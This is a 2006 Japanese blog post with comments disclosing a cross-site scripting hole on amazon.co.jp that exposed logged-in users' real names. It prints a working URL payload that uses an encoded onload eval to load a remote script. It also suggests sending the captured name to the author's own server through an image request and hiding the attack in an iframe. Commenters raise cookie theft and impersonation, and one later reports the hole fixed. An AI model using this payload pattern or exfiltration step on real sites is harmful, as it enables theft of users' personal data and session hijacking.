はまちや2さんの日記
本名吸い取り機 (AMAZON XSS)2006/05/18 [17:25]
↓これ
超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません )
取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…!
本名吸い取り機のできあがり!
こわいね><
リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ!
(ちょっとだけ解説)
↓urlデコードするとこう
http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 104, 97, 109, 97, 99, 104, 105, 121, 97, 46, 99, 111, 109, 47, 106, 117, 110, 107, 47, 97, 109, 49, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41))>
※ charcode にしてあるのは、ダブルクオートとスラッシュがつかえなかったからです><
↓charcodeのところを文字になおすとこう
var s=document.createElement('script'); s.src='http://hamachiya.com/junk/am1.js'; document.body.appendChild(s)
(対策)
とりえあず cookie さくじょすれば、名前でなくなるけど…
amazon って、ふつうにログアウトするにはどうやるのかな><
はまちや2 2006/05/18 [17:48]
あ、「サインインしてください」のところ押したら名前でなくなったよ!!
brazil 2006/05/18 [21:01]
ログインすると、ログアウトする、ところてん方式だよね。
名無しさん 2006/05/19 [12:00]
あのー、アマゾンがセキュリティホールを埋めるまで公開を自粛すべきではないでしょうか。
この方法でクッキーを取得し、他人になりすますことが可能ですよね?
moricoro 2006/05/19 [21:43]
>名無しさん
とりあえずAmazonにメールしてみたよ。
ーー
また、Amazon.co.jp,Amazon.comのシステムはどのような場合においてもお客様
の
信用をそこなうことはなく、お客様の個人情報の安全性を保証しておりますので
ご安
心ください。Amazonのセキュアサーバーを使用して行われた、すべての処理は安
全
であることを保証いたします。
ーー
って返ってきたよ。
anonymous 2006/05/20 [01:01]
隠しても問題解決にはならないよ!
むしろ教えてくれているだけ親切だとも思う!思う!
これからの作者さんも気をつける手法の参考になるしね!
Sampo 2006/05/20 [02:37]
あ、XSS無効になってる。
素っ気ないメールを返しながら、意外に仕事は速いぞAmazon